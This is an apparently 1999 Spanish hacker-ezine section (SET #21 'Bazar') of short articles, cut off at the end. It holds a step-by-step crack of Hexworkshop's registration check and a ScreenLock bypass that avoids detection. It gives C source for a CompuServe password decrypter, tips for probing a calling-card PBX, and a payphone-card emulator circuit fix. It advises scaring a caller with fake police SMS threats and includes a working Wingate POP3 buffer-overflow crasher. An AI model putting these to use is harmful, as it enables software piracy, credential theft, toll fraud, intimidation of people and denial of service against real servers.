-[ 0x03 ]-------------------------------------------------------------------- -[ Bazar ]------------------------------------------------------------------- -[ by Varios Autores ]------------------------------------------------SET-21- . ,#' ,# .,,. ,.###:. ,, '#,:#$#. #$"#; .# #; ,;#' .# #; :# '# $. ,# #' '# ,#' #' '# $# ,:###' "#,,$#,. ,#$#;:'` "#,,$#,. ,:' - [ SET #21 ] - El Bazar, aqui encontrareis articulos que dado su tama~o o contenido hemos preferido juntar en esta secion fija. Donde podeis enviar todos vuestros trucos o ayudas. A la direcion siguiente. Solo recordaros el estilo, no usar acentos, e~es o similares. Para mas informacion sobre el estilo a usar, leed Proyectos, Peticiones y Avisos en 0x07. Y algo mas, hay muchos temas sobre los que escribir, LEED los SETs atrasados y no escribais sobre temas ya tratados, a no ser : a) Que vayas a ampliar la informacion b) Que sea material actualizado. En este numero tenemos los siguientes articulos dentro de nuestro zoco particular. En este numero hacemos mencion especial al Dr_Zippie que no fue capaz de esperar a la salida de SET #21 y decidio publicar el articulo que nos habia enviado en Kriptopolis, con lo que hemos decidido eliminarlo del Bazar. No sabemos que ansias de ser famoso tenia pero las ha conseguido. Con esto quiero recordar que ningun articulo que nos enviais cae en saco roto, se publicaran mas tarde o mas temprano. Indice de Bazar SET #21 : 0x01 : Como crackear Hexworkshop 1.0 : Dark Angel 0x02 : Hackeando Screenlock : 221bo"sKt 0x03 : Walker - Compuserve 3.0 Password Decrypter : m0f0 0x04 : Tarjeta Universal UNI2 : GreeN LegenD 0x05 : Cazando Fantasmas (Caller-ID Cutre) : Maikel 0x06 : Revision del emu de TPT de JM Garcia : +NetBuL 0x07 : Denial Of Service: Buffer Overflows Remotos : Obocaman 0x08 : BookMarks : SET Staff 0x09 : En el quiosco virtual : SET Staff -< 0x01 >----------------------------------------------.----------------.---- `-[ Dark Angel )-‹ Como crackear Hexworkshop 1.0 por Dark Angel -------------------------------------------- El proceso de crackeo de este tipo de archivos es sencillisimo, este peque~o tutorial podrias seguirlo sin ningun tipo de conocimientos de ensamblador dedicandote a repetir lo que he escrito aqui, pero si no sabes nada de ensamblador, por favor deja de leer este tutorial, vete a la biblioteca/libreria m s cercana y pillate un buen libro de ensamblador, yo te recomiendo: "Lenguaje ensamblador de los 80x86" por Jon Beltran de Heredia de la editorial Anaya, la serie gris, es muy bueno o bajate algun manual de la red, que ahi tienes muchos algunos de ellos muy buenos. Bueno al grano: Lo primero necesitaras un par de herramientas: - W32dasm8.x o algun buen desensamblador. - Un editor hexadecimal te recomiendo hiew. - Algun compilador, C o Pascal por decir alguno para hacer el crack Analicemos un poco el programa: Hexworkshop es un editor hexadecimal muy bueno, yo lo utilizo mucho tiene muchas posibilidades, pero si haces clic en Help y en about Hexworkshop te aparecer  un bonito mensaje pidiendote que te registres, Ahora introduce en Serial Number "1234", te aparecera un mensaje del tipo You have entered an invalid registration number (de verdad?), bueno, ante esto tenemos muchas posibilidades de crackeo pero nos quedaremos con la mas facil. Lo primero que hay que hacer es abrir es W32dasm y desensamblar el archivo exe (NOTA: te recomiendo que hagas una copia de seguridad del exe original antes de tocar nada por si metes la pata) Buscamos la cadena "You have entered" (con el boton de la linterna en el menu Search) y nos aparece una sola coincidencia, si miramos un par de lineas mas arriba, veremos : DialogID_0075. Buscamos la cadena DialogID_0075 y aparecemos en la linea *Posible reference to Dialog: DialogID_0075, solo hay dos ocurrencias en el archivo una al principio y otra al final, nos quedamos con la del final. Miramos mas arriba hasta que encontremos *Referenced by a (U) nconditional or (C)onditional Jump at Adress: 0004.CBB7(C) Puede que en vuestro ordenador los numeros sean diferentes. Nos vamos hasta la direccion que nos indica el salto. Y alli vemos: 0004.CBB7 7549 jne CC02 Bingo, ahi esta nuestra linea, es una salto condicional que se salta la ventana de error, entonces si cambiamos el jne por un je estaria todo arreglado, apuntamos el valor de Offset que hay abajo 0002F917h Arrancamos el hiew, pulsamos F4 y seleccionamos decode pulsamos F5 y escribimos el offset no hace falta escribir la h del final, cuando lo escribamos y aparezcamos en la linea del salto, pulsamos F4 y seleccionamos Hex y apuntamos el caracter que tenemos en la posicion indicada que es una "u" , pulsamos F4 y seleccionamos decode, pulsamos F3 para editar el archivo y cambiamos el 5 por un 4 pulsamos F9 y despues F4 para seleccionar Hex volvemos a apuntar el caracter, que ahora sera una "t" y pulsamos F10 para salir. Para hacer el crack os pido que le echeis imaginacion, solo os digo que vayais a la posicion del archivo que teniamos apuntada (ojo, hay que esta en hexa), y hacemos un par de comprobaciones y cambies el caracter "u" por una "t". Espero que este documento os haya servido de ayuda y hasta otra. Dark Angel -< 0x02 >------------------------------------------------.---------------.--- `-[ 221bo"sKt )-‹ Hackeando ScreenLock -------------------------- Aviso: No tomo ninguna responsabilidad de los fines destructivos o ilegales que pueda tener ese archivo. Fue creado con el fin de ayudar a aquellas personas que olvidaron la contrae~a. Este bug fue detectado en la version de ScreenLock 4.0. No hay ninguna garantia de que funcione en otras versiones y en la version 5.5 he comprobado que no funciona. Hackear ScreenLock es muy sencillo. Cuando salga la pantalla de ScreenLock pulsa . La ventana se cerrara y tendras que apresurarte a teclear . Si tardas demasiado la ventana de ScreenLock se volvera a abrir y habra que volver a empezar. Una vez tienes el menu de aplicaciones abiertas, selecciona la aplicacion "WinSys" y haz click sobre "Finalizar Tarea". Y ya esta. Si todo esto no te funciona, teclea cuando te salga la ventana de ScreenLock, luego la tecla de la flecha a la derecha (->) cinco veces, entonces apreta y seguidamente dos veces la flecha hacia abajo e otra vez. Rapidamente teclea y continua como arriba. NOTA: Cuando el usuario real (es decir, en teoria tu) tenga el control del ordenador y mire los asaltos ocurridos, NO te detectara ;-) Desde luego, la compa~ia deberia corregir semejante error, X que su programa ahora mismo no tiene ninguna utilidad! 221bo"sKt Theres someone more in the neiverhood -< 0x03 >------------------------------------------------.----------.-------- `-[ m0f0 )-‹ Este es un peque~o programa que demuestra la inseguridad del algoritmo de generacion de passwords de Compuserve. Espero que le deis buen uso y no abuso. Esto deberia de compilar con Borland C bajo dos y sin problema bajo Linux. (Tambien compila perfectamente bajo Djpp) <++> source/walker.c // Walker - Compuserve 3.0 password decrypter #include #include #include #define LEN 1024 char *array1 = "C6FDC7A1EDFBB6FEE3DBF5BEBAEFDDF7AB"; char *array2 = "E6DDE781CDDB96DEC3FBD59E9ACFFDD7E7DCE680CCDA97DFC2FAD49F9BCEFCD6" "E4DFE583CFD994DCC1F9D79C98CDFFD5E5DEE482CED895DDC0F8D69D99CCFED4" "E2D9E385C9DF92DAC7FFD19A9ECBF9D3E3D8E284C8DE93DBC6FED09B9FCAF8D2" "E0DBE187CBDD90D8C5FDD3989CC9FBD1E1DAE086CADC91D9C4FCD2999DC8FAD0" "EED5EF89C5D39ED6CBF3DD9692C7F5DFEFD4EE88C4D29FD7CAF2DC9793C6F4DE" "ECD7ED8BC7D19CD4C9F1DF9490C5F7DDEDD6EC8AC6D09DD5C8F0DE9591C4F6DC" "EAD1EB8DC1D79AD2CFF7D99296C3F1DBEBD0EA8CC0D69BD3CEF6D89397C2F0DA" "E8D3E98FC3D598D0CDF5DB9094C1F3D9E9D2E88EC2D499D1CCF4DA9195C0F2D8" "F6CDF791DDCB86CED3EBC58E8ADFEDC7F7CCF690DCCA87CFD2EAC48F8BDEECC6" "F4CFF593DFC984CCD1E9C78C88DDEFC5F5CEF492DEC885CDD0E8C68D89DCEEC4" "F2C9F395D9CF82CAD7EFC18A8EDBE9C3F3C8F294D8CE83CBD6EEC08B8FDAE8C2" "F0CBF197DBCD80C8D5EDC3888CD9EBC1F1CAF096DACC81C9D4ECC2898DD8EAC0" "FEC5FF99D5C38EC6DBE3CD8682D7E5CFFFC4FE98D4C28FC7DAE2CC8783D6E4CE" "FCC7FD9BD7C18CC4D9E1CF8480D5E7CDFDC6FC9AD6C08DC5D8E0CE8581D4E6CC" "FAC1FB9DD1C78AC2DFE7C98286D3E1CBFBC0FA9CD0C68BC3DEE6C88387D2E0CA" "F8C3F99FD3C588C0DDE5CB8084D1E3C9F9C2F89ED2C489C1DCE4CA8185D0E2C8" "86BD87E1ADBBF6BEA39BB5FEFAAF9DB787BC86E0ACBAF7BFA29AB4FFFBAE9CB6" "84BF85E3AFB9F4BCA199B7FCF8AD9FB585BE84E2AEB8F5BDA098B6FDF9AC9EB4" "82B983E5A9BFF2BAA79FB1FAFEAB99B383B882E4A8BEF3BBA69EB0FBFFAA98B2" "80BB81E7ABBDF0B8A59DB3F8FCA99BB181BA80E6AABCF1B9A49CB2F9FDA89AB0" "8EB58FE9A5B3FEB6AB93BDF6F2A795BF8FB48EE8A4B2FFB7AA92BCF7F3A694BE" "8CB78DEBA7B1FCB4A991BFF4F0A597BD8DB68CEAA6B0FDB5A890BEF5F1A496BC" "8AB18BEDA1B7FAB2AF97B9F2F6A391BB8BB08AECA0B6FBB3AE96B8F3F7A290BA" "88B389EFA3B5F8B0AD95BBF0F4A193B989B288EEA2B4F9B1AC94BAF1F5A092B8" "96AD97F1BDABE6AEB38BA5EEEABF8DA797AC96F0BCAAE7AFB28AA4EFEBBE8CA6" "94AF95F3BFA9E4ACB189A7ECE8BD8FA595AE94F2BEA8E5ADB088A6EDE9BC8EA4" "92A993F5B9AFE2AAB78FA1EAEEBB89A393A892F4B8AEE3ABB68EA0EBEFBA88A2" "90AB91F7BBADE0A8B58DA3E8ECB98BA191AA90F6BAACE1A9B48CA2E9EDB88AA0" "9EA59FF9B5A3EEA6BB83ADE6E2B785AF9FA49EF8B4A2EFA7BA82ACE7E3B684AE" "9CA79DFBB7A1ECA4B981AFE4E0B587AD9DA69CFAB6A0EDA5B880AEE5E1B486AC" "9AA19BFDB1A7EAA2BF87A9E2E6B381AB9BA09AFCB0A6EBA3BE86A8E3E7B280AA" "98A399FFB3A5E8A0BD85ABE0E4B183A999A298FEB2A4E9A1BC84AAE1E5B082A8" "A69DA7C18D9BD69E83BB95DEDA8FBD97A79CA6C08C9AD79F82BA94DFDB8EBC96" "A49FA5C38F99D49C81B997DCD88DBF95A59EA4C28E98D59D80B896DDD98CBE94" "A299A3C5899FD29A87BF91DADE8BB993A398A2C4889ED39B86BE90DBDF8AB892" "A09BA1C78B9DD09885BD93D8DC89BB91A19AA0C68A9CD19984BC92D9DD88BA90" "AE95AFC98593DE968BB39DD6D287B59FAF94AEC88492DF978AB29CD7D386B49E" "AC97ADCB8791DC9489B19FD4D085B79DAD96ACCA8690DD9588B09ED5D184B69C" "AA91ABCD8197DA928FB799D2D683B19BAB90AACC8096DB938EB698D3D782B09A" "A893A9CF8395D8908DB59BD0D481B399A992A8CE8294D9918CB49AD1D580B298" "B68DB7D19D8BC68E93AB85CECA9FAD87B78CB6D09C8AC78F92AA84CFCB9EAC86" "B48FB5D39F89C48C91A987CCC89DAF85B58EB4D29E88C58D90A886CDC99CAE84" "B289B3D5998FC28A97AF81CACE9BA983B388B2D4988EC38B96AE80CBCF9AA882" "B08BB1D79B8DC08895AD83C8CC99AB81B18AB0D69A8CC18994AC82C9CD98AA80" "BE85BFD99583CE869BA38DC6C297A58FBF84BED89482CF879AA28CC7C396A48E" "BC87BDDB9781CC8499A18FC4C095A78DBD86BCDA9680CD8598A08EC5C194A68C" "BA81BBDD9187CA829FA789C2C693A18BBB80BADC9086CB839EA688C3C792A08A" "B883B9DF9385C8809DA58BC0C491A389"; void desen (char *pass, char *hackpot); void main (int argc, char *argv[]) { FILE *f, *g; int i,j,n; char s[LEN],t[LEN]; char par[LEN],pass[LEN],hackpot[LEN]; int longit, lugar; char account[LEN]; int leido_account; char *p; printf ("\n"); printf (" *********************************************+** \n"); printf (" * * \n"); printf (" * Walker - Compuserve 3.0 Password Decrypter * \n"); printf (" * * \n"); printf (" * written by m0f0 1999 * \n"); printf (" * * \n"); printf (" ************************************************ \n"); printf ("\n"); if (argc!=2) { printf ("Uso : WALKER \n\n",argv[0]); exit (1); } g = fopen (argv[1],"r"); if (g==0) { printf ("Error opening file %s \n\n",argv[1]); } leido_account = 0; while (fgets (s,1024,g)) { s[strlen(s)-1] = 0; if (leido_account) { // last line : [Account... p = strstr (s,"="); sprintf (pass,p+1); printf ("Account = %s \n",account); desen (pass,hackpot); printf ("Password = %s \n",hackpot); printf ("\n"); leido_account=0; } p = strstr (s,"[Account"); if (p!=NULL && !leido_account) { leido_account = 1; p = strstr (s," "); sprintf (account,p+1); account[strlen(account)-1] = 0; if ( account[strlen(account)-1] == ']') { account [strlen (account)-1] = 0; } } } fclose (g); } void desen (char *pass, char *hackpot) { int i, longit, lugar; char s[LEN], t[LEN], par[3]; // Calcular numero de caracteres del password (longit) for (longit=0; longit<=16; longit++) { s[0] = pass [longit*2]; s[1] = pass [longit*2+1]; s[2] = 0; t[0] = array1[longit*2+0]; t[1] = array1[longit*2+1]; t[2] = 0; if (!strcmp (s,t)) { break; } } strcpy (hackpot,""); for (i=1; i<=longit; i++) { par[0] = pass [2*i-2]; par[1] = pass [2*i-1]; par[2] = 0; for (lugar=32; lugar<=126; lugar++) { t[0] = array2[(lugar-32)*32 + 2*(i-1) + 0]; t[1] = array2[(lugar-32)*32 + 2*(i-1) + 1]; t[2] = 0; if (!strcmp (par,t)) { break; } } hackpot [i-1] = lugar; } hackpot [i-1] = 0; } <--> -<0x04 >----------------------------------------------.------------------.--- `-[ GreeN LegenD )-‹ Bueno gentes, la operadora Uni2 puso a la venta hace poco su tarjeta Universal. Que en el fondo es una Calling Card tradicional. Veamos como funciona. Llamas a un numero 900, este caso es el 900 900 988 y lo primero te piden el idioma, seleccionas castellano con 1. Despues te pide que teclees tu numero de tarjeta y #. Depues te dira el saldo restante de tu tarjeta. Luego te pide que marques el numero al que quieres llamar. Acto seguido eres conectado. Este es el uso normal de la tarjeta, pero observemos la tarjeta con ojos de Hacker, Phreaker en este caso. Que vemos ? Una especie de PBX. Y vemos que la tarjeta esta compuesta por un numero de 11 digitos tal que : 16 400 392 423 Hay varias posibilidades, una de ellas es intentar hacer Wardialing, pero este metodo no nos iba a dar grandes resultados. Otra opcion es tratar de hallar el algoritmo que genera el numero. Esto es tarea un poco mas costosa. Dado que no hay tantas tarjetas por ahi. La informacion en una tarjeta es la siguiente. 900 900 988 - Uni2 Fecha de Caducidad 08/00 Lote N 9164077 Y si necesitais molestar a Uni2 este es su numero de atencion al cliente que dicen funciona 24hrs, Ja.. como el de movistar. 900 902 320 Haced pruebas por que han tenido el pbx mal configurado y si quereis jugar probad un movil nokia+datasuite y el THC-SCAN o el Pbx-Hack. Salu2. GreeN LegenD -< 0x05 >-------------------------------------------------.------------.----- `-[ Maikel )-‹ ______________________________________________________________________________ C A Z A N D O F A N T A S M A S ( O C A L L E R - I D C U T R E ) ______________________________________________________________________________ Maikel Octubre de 1999 3 de la tarde de un Sabado cualquiera... Suena el telefono... - Diga? -... - Diga? -... - Si no vas a decir nada cuelga, anda... - (cuelga) Vaya, un tipo raro, (di por supuesto que era un hombre, cosa que al final resulto ser erronea ), en fin esperare a ver si vuelve a llamar, o era una confusion... 5 minutos despues suena otra vez... - Diga? -... - Diga? -... - Joder macho, te repites mas que el chorizo...(esta parida no la dije pero bueno me mola ponerla ahora...) - (cuelga) Mierda ya me estoy rayando de buena tarde... quien co~o sera?, empece a recordar todos los posibles "enemigos" y la verdad, no tenia ninguno...en fin, si tuviera un trasto de esos que te dicen el caller-id, una vez creo que me llamaron de telefonica vendiendome uno... pero valia un paston... Pensemos, seguro que va a volver a llamar... ... * ...... *** ........ * ......... U <-- bombilla encendida...(muy chunga lo se...) Creo recordar que los de telefonica me estan cobrando 200 pelas al mes por un servicio de redireccionamiento de llamada... y si no recuerdo mal los moviles tienen caller-id.... Manual pa currarse un Caller-id de emergencia... Ingredientes: -Telefono RTC (normal y corriente) -Estar de alta en algun servicio de redireccionamiento de llamada, el de telefonica por ejemplo... -Tener a algun alma perdida llamando a tu casa... -Telefono movil con caller-id u otro objeto similar. Pues esto fue lo que hice... Active el redireccionamineto...que con Telefonica Espa~a es: Activar: *21*numerodelmobil# Desactivar: #21# Y a esperar.... minutos despues... Suena el movil... y en la ventanita aparece ... 607xxxxxxxx, vaya llama desde un movil... quien sera? No lo conozco... .... F A S E A C O J O N I N G .... En fin ahora viene la parte mas divertida...puesto que es un movil podemos enviarle un mensajito via SMS ... os vais haciendo una idea? Visitais alguna de las muchas webs que te dan este servicio gratuito... http://www.airtel.es http://www.teleline.es (creo) etc... "Atencion usted ha sido denunciado por utilizar su movil para hostigar a la familia XXXXXXX en continuadas ocasiones. Dentro de unos dias se le retirara la cobertura de su movil, y la Policia visitara su domicilio para darle en mano los papeles de la denuncia y ...etc" En fin que lo acojonamos... Tambien puedes llamar al movil y decir que eres la policia, pero eso es un poco mas chungo, pero si eres buen actor... Este sistema funciona muy bien... Lo malo es que hay un sistema para que no se vea el caller-id, si eres una de esas almas perdidas que les mola llamar a la gente no leais lo que dire ahora. Telefonica se inventa el prefijo 067 que puesto antes de cada llamada oculta el caller-id. !PERO POR QUE CO~O HAN INVENTADO ESO!!!!!!!!!!! Perdonad la expresion pero es que no se para que puede servir aparte de para que algun alma perdida se dedique a llamar a su enemigo de turno... Nota para los almas perdidas: No se os ocurra utilizar el 067 , porque si tocais mucho los huevos a algun particular os puede denunciar, y entonces los de Telefonica miran en sus archivos que si que guardan el caller-id y la vas a liar, idem con telefonos no particulares, que ademas en algunos casos como Bomberos, o la Policia no tienen problemas para ver tu caller-id incluso con el 067... Ehh!!!! no os he contado el final de la historia. Resulta que el se~or x, era la exnovia de turno de mi hermano que estaba poco satisfecha... lo que son las cosas... NOTA: Para comprobar que marcando el 067 se oculta el caller-id llame desde mi telefono al movil, y os recomiendo que no lo hagais en casa. Parece ser que los moviles tienen ciertas propiedades antiterapeuticas ademas de afectar a la radio, telefonos, microfonos, pantallas de ordenador, tostadoras... tambien afectan a los seres vivos. Si no me creeis llamaros al movil y poneros entre el auricular del movil y el del telefono de casa... En fin un saludo, Maikel 20 de octubre de 1999 -< 0x06 >-------------------------------------------------.-------------.---- `-[ +NetBuL )-‹ Revision del emu de TPT de JM Garcia ------------------------------------ En la seccion SET Inbox de SET #20 aparece un mail de BlueScript (a ver si escribes ese articulo sobre seguridad de la T!! :D) donde comenta un posible fallo en el emulador de JM Garcia (tprom.doc). Este emulador redirige los primeros 96 bits (0-95) al chip de una tarjeta original y el resto a una memoria RAM. El fallo podria estar en que la memoria esta inicialmente a 0 y como sabeis los 10 bits posteriores al 95 (96-105) vienen marcados a 1 de fabrica en las tarjetas de 8 contactos y 256 bits. Como no es la primera vez que leo esto (ver el itt.doc de Merlin sobre emulacion) vamos a ver si lo arreglamos de una vez por todas... :) En la figura 3 del doc de JM Garcia aparece un esquema del emulador. Arriba a la derecha, junto al contador 4040 esta el asunto en cuestion... La puerta AND (IC3D) y la puerta OR formada por los diodos (D2 y D3) y la resistencia (R3) funcionan como un decodificador de direcciones de forma que a la salida de los diodos D2 y D3 tendremos un 1 siempre que la salida del contador sea mayor o igual que 96; si ahi aparece un 1 entonces la salida que ira al lector sera la de la RAM, si es un 0 se leera de la tarjeta original. Si suponemos que el lector (lease cabina ;->) no verifica esos 10 bits a 1, el decodificador es sencillo: la linea conectada a la salida Q8 del 4040 saca un 1 directamente si el contador va por el 128 o mas (1XXXXXXX), y a la salida de la puerta AND tenemos un 1 siempre que Q7 y Q6 esten a uno (011XXXX), es decir siempre que el contador se encuentre entre 96 y 127. salidas 4040 8765 4321 decimal ------------ ----------- 011X XXXX ( 96 - 127) 1XXX XXXX (128 - 255) . . -| -|Q9 ---------------------+---------------|Q8 ---------------+-----|---------------|Q7 . ------------+--|-----|---------------|Q6 . | | | -|Q5 | | | | -|Q4 | .---.____| | | -|Q3 |______|/|____________( AND|______/ | -|Q2 | |\| D2 '---' | -|Q1 | 1N4148 IC3D | |_________ _ _ | 4081 | 4040 |______|/|______________________________/ | |\| D3 .-. 1N4148 | | R3 |_| 10K | ----- --- - ..........> Decodificador de direcciones original (96-255) ............................................................> Pero si tenemos en cuenta esos bits a 1 la cosa se complica un poco mas, ahora tenemos que sacar un 1 solo cuando el contador sea mayor o igual que 106: salidas 4040 8765 4321 decimal ------------ ----------- 0110 101X (106 - 107) 0110 11XX (108 - 111) 0111 XXXX (112 - 127) 1XXX XXXX (128 - 255) En teoria el decodificador quedaria asi (usando puertas AND de 2 entradas): . . -| -|Q9 ---------------------+---------------|Q8 ---------------+-----|---------------|Q7 . ------------+--|-----|---------------|Q6 . | | | -+-----------|Q5 | | | | -|--+--------|Q4 | .---.____| | | -|--|--+-----|Q3 | ,-( AND|______/ | -|--|--|--+--|Q2 | / '---' | | | | | -|Q1 | | IC3D | | | | | |_________ _ _ | | 4081 | | | | | 4040 |_______|/|_______.-.____________________/ | | | | | |\| D3 | | | | | | 1N4148 | | | | | | | | | | | | | | | | | | .---.___/| | | | | |__|/|___( |___.-.________________________/ | | | | |\| '---' | | | | | | | | | | .---.___/| .---.___________/| | | |__|/|___( |___.-.__________( |___________.-./ | | |\| '---' | '---' | | | | | | | .---.___/ .---.___________/ | |__|/|___( |________________( |_________________/ | |\| '---' '---' | .-. | | R3 |_| 10K | ----- --- - ..........> Decodificador de direcciones modificado (106-255) [A] ..................................................................> O asi, usando puertas AND de 3 entradas: . . -| -|Q9 ---------------------+---------------|Q8 ---------------+-----|---------------|Q7 . ------------+--|-----|---------------|Q6 . | | | -+-----------|Q5 | | | | -|--+--------|Q4 | .---.____| | | -|--|--+-----|Q3 | ,-( AND|______/ | -|--|--|--+--|Q2 | / '---' | | | | | -|Q1 | | IC3D | | | | | |_________ _ _ | | 4081 | | | | | 4040 |_______|/|_______.-.____________________/ | | | | | |\| D3 | | | | | | 1N4148 | | | | | | | | | | | | .---.___/| | | | | |__|/|___( |___.-.________________________/ | | | | |\| ( |___.-.___'1' Vcc | | | | '---' | | | | | .---.___/| | | | |__|/|___( |___.-.___________________________/| | | | |\| ( |___.-.___________________________.-./ | | '---' | | | | .---.___/ | | |__|/|___( |_________________________________/ | | |\| ( |_______________________________________/ | '---' .-. | | R3 |_| 10K | ----- --- - ..........> Decodificador de direcciones modificado (106-255) [B] ..................................................................> A la lista de la compra hay que a~adir 2 diodos y dos 4081 (en el primer caso) o un 4073 (en el segundo). El BF320 hace mil a~os que no existe pero hay equivalentes. Conseguir la RAM (4537) es mucho mas dificil pero no imposible, la solucion esta en internet. Algunas empresas se dedican a la compra de stocks de productos desfasados para venderlos a precio de oro, asi que ya sabeis lo que hay... El pinout de los IC's: 4081 4073 Quad 2-input AND gates. Triple 3-input AND gates. +----------+ +----------+ 1A |1 +--+ 14| VCC 2A |1 +--+ 14| VCC 1B |2 13| 4B 2B |2 13| 3C 1Y |3 12| 4A 1A |3 12| 3B 2Y |4 4081 11| 4Y 1B |4 4073 11| 3A 2A |5 10| 3Y 1C |5 10| 3Y 2B |6 9| 3B 1Y |6 9| 2Y GND |7 8| 3A GND |7 8| 2C +----------+ +----------+ Y=AB Y=ABC Por cierto, un par de curiosidades... el emulador de marras aparece en dos libros: 'Tarjetas inteligentes' (Ed. Paraninfo) y 'Hackers, piratas tecnologicos' de Claudio Hernandez (Ed. Coelma). En el caso del primero es increible ver la jeta que tienen algunos, aparece una copia identica del texto y los esquemas y no dan creditos por ningun sitio. En el segundo la informacion no esta fotocopiada, es lo mismo pero se lo han currado mas, aunque del autor solo aparece un ro~oso "J.G." en la lista de colaboradores al principio del libro. Lo que hay que ver. Ya de paso, en este libro aparece el esquema de un emulador hecho con un PIC, no os volvais locos, es el mismo que salio en la Phrack #48. Ah, se me olvidaba el rollete tipico sobre fines educativos y demas, aunque esta vez no lo suelto, la informacion esta ahi y cada uno que haga lo que le salga de los webs... es TU responsabilidad. Ademas, visto lo visto... yo no he visto nada. X-DD Si tienes algo que corregir, mejorar, etc, mail al canto y listo. Y si alguien tiene tiempo, dinero y paciencia para montarlo que me avise si funciona.. :-) un saludo +NetBuL Nota: el emulador de JM Garcia (tprom.zip) y otros docs que nombro aqui los podeis encontrar en la web de Vanhackez o en su CD TVH-1. http://www.vanhackez.com -< 0x07 >-------------------------------------------------.--------------.--- `-[ Obocaman )-‹ * * Denial Of Service: Buffer Overflows Remotos. * * Obocaman / OiOiO's Band 1999 * 1. Introduccion. En este peque~o articulo tratare de explicar de manera muy sencilla que son los DoS (Denial Of Service, Denegacion de Servicio), y concretamente el de los buffer overflows remotos. Un buffer overflow consiste en sobrepasar el tama~o asignado de una variable en memoria, con lo que se desborda la pila de datos y el programa se cierra o se bloquea. Si en los datos que usamos para sobrecargar la pila metemos estrategicamente una serie de datos, el programa los ejecutara, y entonces podemos llegar a hacernos con el control de la maquina. 2. Caso practico: DoS para Wingate. Si se esta un poco al loro sobre las noticias de seguridad informatica (listas de correo, webs, etc...) veremos que suelen haber noticias de este tipo: "El programa X tiene un bug bastante gordo, si nos conectamos al puerto Y y escribimos 1000 caracteres, el programa X se cuelga", mas o menos ;) Cuando salio el Wingate 2.0, rapidamente se descubrieron un par de fallos de este tipo, uno por el puerto SMTP (25) y otro por el POP3 (110). El 'truco' consistia en enviar unos 4000 caracteres por esos puertos, desbordando la pila y con la consecuencia que se cerraba el programa (a veces colgando completamente la maquina). El proceso para explotar este DoS es muy sencillo: nos conectamos al servidor, escribimos los 4000 caracteres, le damos a intro, y arreando. Esto se puede hacer perfectamente a mano, pero para ser un poco mas practicos y aprender de paso a programar sockets en C, haremos un peque~o programa que lo haga por nosotros ;) 3. Programa: <++> source/wgatover.c /* * Wingate 2.01 POP3 buffer overflow * by Obocaman / OiOiO's Band, 1999 * * Based on the MDaemon SMTP buffer overflow, by Rootshell. * http://www.rootshell.com * * Distribute this code freely, it's licensed under GPL. */ /* tipicas cabeceras */ #include #include #include #include #include #include #include void main(int argc, char *argv[]) { struct sockaddr_in sin; struct hostent *hp; if (argc != 2) { printf("Wingate 2.01 crasher, by Obocaman / OiOiO's Band 1999\n"); printf("Based on MDaemon SMTP exploit,(C) Rootshell, www.rootshell.com\n"); printf("Uso: %s \n", argv[0]); exit(1); } hp = gethostbyname(argv[1]); if (hp==NULL) { printf("Host desconocido: %s\n",argv[1]); exit(1); } char *buffer; int sock, i; bzero((char*) &sin, sizeof(sin)); bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length); sin.sin_family = hp->h_addrtype; sin.sin_port = htons(110); /* Puerto 110, POP3 */ sock = socket(AF_INET, SOCK_STREAM, 0); if((connect(sock,(struct sockaddr *) &sin, sizeof(sin))) == -1) { printf("Hubo un error en la conexion.\n"); exit(1); } buffer = (char *)malloc(10000); sprintf(buffer, "USER x#"); for (i = 0; i<4096; i++) strcat(buffer, "9"); strcat(buffer, "\r\n"); /* enviamos la cadena USER x#999...999 por el puerto */ write(sock, &buffer[0], strlen(buffer)); close(sock); free(buffer); } <--> 4. Consideraciones Como veis, no es tan dificil. Cambiando un par de cosas en el codigo se podria hacer un 'DoSer' generico, tan solo habria que decirle el host, el puerto y la cantidad de bytes a mandar, y ya esta. Weno, y ahora el asunto moral/legal. Ir por ahi colgando programas o maquinas no esta muy bien visto, que digamos. El fin de este peque~o articulo es dar conocimiento, no proveer un arma de ataque, asi que, intencionadamente, el codigo fuente no compila si no se le hace una peque~a modificacion (supongo que los script-kiddies que lean esto se estaran cagando en mi, pero weno... X'DDDD). Y por ultimo, los saludos de rigor para OiOiO's Band, SJF Project, Undersec, SET, y toda la pe~a que estuvo en la NcN'99. -< 0x08 >-------------------------------------------------.---------------.-- `-[ SET Staff )-‹ B_ O_ O_ K_ M_ A_ R_ K_ S_ Algunas direcciones que pueden ser de interes, graciosas o utiles. Las encontrareis aqui. Tambien las podeis enviar vosotros, a la direccion habitual --[ http://www.zinestore.com.ar ] La pagina donde podeis encotrar casi todas las ezines ha cambiado de URL, ahora tiene su propio dominio en Argentina. Una pagina _muy_ recomendable. Visitadla! No os ireis con las manos vacias. --[ http://www.ericsson.com/medialab/warriors/ ] Video genial sobre el funcionamiento de la red a nivel muy, pero que muy basico. DATO: Ocupa 150 MBytes, pero merece la pena. --[ http://rinkworks.com/stupid/ ] Para pasar un buen rato. Un buen repertorio de anecdotas sobre servicios tecnicos y curiosidades acerca de los ordenadores, desternillante. --[ http://www.userfriendly.org ] Quien a estas alturas no conozca UserFriendly no tiene perdon. Se trata de una tira comica que se publica diariamente. Es genial, y desde luego todo el mundo debiera conocerla. --[ http://margo.student.utwente.nl/stefan/chipdir/ ] --[ http://www.questlink.com/ ] Buscas algun circuito integrado en especial? No recuerdas el conexionado de un 8085? Pues estas dos direcciones son la salvacion. Un buen repertorio de circuitos integrados con sus respectivas caracteristicas tecnicas. --[ http://www.proteccioncivil.org/vademecum ] Quien decia que eso de la triangulacion pasiva era un mito? Pues nada, nada. En el Vademecum del plan REMER de Proteccion Civil hay un capitulo dedicado a explicar que es eso de la radiodeterminacion. --[ http://www.cdlr.org ] Nuevo dominio que estrenan la gente de Proyecto R, web bien contruida y de carga rapido con los contenidos justos. Visitadla. -< 0x09 >-------------------------------------------------.---------------.-- `-[ SET Staff )-‹ -|- EN EL QUIOSCO VIRTUAL -|- Mientras estabamos acabando y retocando el numero #21 de SET han salido a la calle estos ezines.. No os los perdais, dado que el saber no ocupa lugar. [ Te faltan direcciones?: Pues vete al bookmark y fijate en ZineStore ;->] --[ Phrack 55 ]-- Al final despues un cierto (solo??) retraso. (Luego hablais de nosotros..) Ha salido Phrack, despues de 9 -N-U-E-V-E- meses, no es que nos comparemos con Phrack ni nada de eso. Pero mantenemos bastante mas nuestra periodicidad Supongo que no tendre que daros la direccion no ? --[ RareGaZz #16 ]-- Pues si se~or la competencia ha vuelto con renovada energia. Despues de gestarse durante varios meses el Staff de Rare ha sacado su nuevo numero. La direcion es la habitual, ahora el grupo es casi todo de la peninsula. Pero leedla vosotros mismos y juzgad. --[ Netsearch #3 ]-- Un 